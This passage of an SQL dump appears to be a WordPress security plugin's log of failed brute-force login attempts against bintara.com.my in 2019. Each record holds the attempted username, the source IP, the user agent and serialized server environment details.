Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"68.183.46.252\";s:11:\"REMOTE_PORT\";s:5:\"41592\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWS9ordCvC5@KvzqwiE7YQAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566883234.6779\";s:12:\"REQUEST_TIME\";s:10:\"1566883234\";}}','notice','2019-08-27 05:20:36','2019-08-27 05:20:35',17685312,19176320,'https://bintara.com.my/wp-login.php',1,0,'68.183.46.252'),(23369,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"3.83.36.180\";s:11:\"REMOTE_PORT\";s:5:\"51110\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWS-UbdCvC5@KvzqwiE82AAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566883665.9837\";s:12:\"REQUEST_TIME\";s:10:\"1566883665\";}}','notice','2019-08-27 05:27:47','2019-08-27 05:27:46',17682984,19174832,'https://bintara.com.my/wp-login.php',1,0,'3.83.36.180'),(23370,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.191.140.28\";s:11:\"REMOTE_PORT\";s:5:\"50826\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTBmbdCvC5@KvzqwiE@hAAAABY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566884250.0995\";s:12:\"REQUEST_TIME\";s:10:\"1566884250\";}}','notice','2019-08-27 05:37:31','2019-08-27 05:37:30',17684576,19174136,'https://bintara.com.my/wp-login.php',1,0,'80.191.140.28'),(23371,0,'brute_force','invalid-login::username-teste','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"teste\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.191.140.28\";s:11:\"REMOTE_PORT\";s:5:\"52414\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTBnYir4pgxiIHnHK45OAAAAcg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566884254.0225\";s:12:\"REQUEST_TIME\";s:10:\"1566884254\";}}','notice','2019-08-27 05:37:35','2019-08-27 05:37:34',18201384,19496888,'https://bintara.com.my/xmlrpc.php',1,0,'80.191.140.28'),(23372,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.112.101\";s:11:\"REMOTE_PORT\";s:5:\"36128\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTDdGXkG1atThADMYGiVwAAAMM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566884725.0008\";s:12:\"REQUEST_TIME\";s:10:\"1566884725\";}}','notice','2019-08-27 05:45:27','2019-08-27 05:45:25',17685040,19175352,'https://bintara.com.my/wp-login.php',1,0,'157.230.112.101'),(23373,0,'brute_force','invalid-login::username-client','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:6:\"client\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"474\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"157.230.112.101\";s:11:\"REMOTE_PORT\";s:5:\"37306\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTDeg0@TGWC-1tzGX57AQAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566884731.0773\";s:12:\"REQUEST_TIME\";s:10:\"1566884731\";}}','notice','2019-08-27 05:45:33','2019-08-27 05:45:31',18201320,19500072,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.112.101'),(23562,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.2.181\";s:11:\"REMOTE_PORT\";s:5:\"45114\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzUTD42Bg6xBpmAmGwUgQAAAFA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567413325.0378\";s:12:\"REQUEST_TIME\";s:10:\"1567413325\";}}','notice','2019-09-02 08:35:26','2019-09-02 08:35:25',18205936,19504696,'https://bintara.com.my/xmlrpc.php',1,0,'139.59.2.181'),(23554,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.95.13.216\";s:11:\"REMOTE_PORT\";s:5:\"40698\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzAlj42Bg6xBpmAmGwFjwAAAEU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567408279.0901\";s:12:\"REQUEST_TIME\";s:10:\"1567408279\";}}','notice','2019-09-02 07:11:20','2019-09-02 07:11:19',18205704,19503680,'https://bintara.com.my/xmlrpc.php',1,0,'103.95.13.216'),(23555,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"39649\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzH5z42Bg6xBpmAmGwKewAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567410151.2654\";s:12:\"REQUEST_TIME\";s:10:\"1567410151\";}}','notice','2019-09-02 07:42:32','2019-09-02 07:42:31',17685744,19176040,'https://bintara.com.my/wp-login.php',1,0,'212.227.20.208'),(23556,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 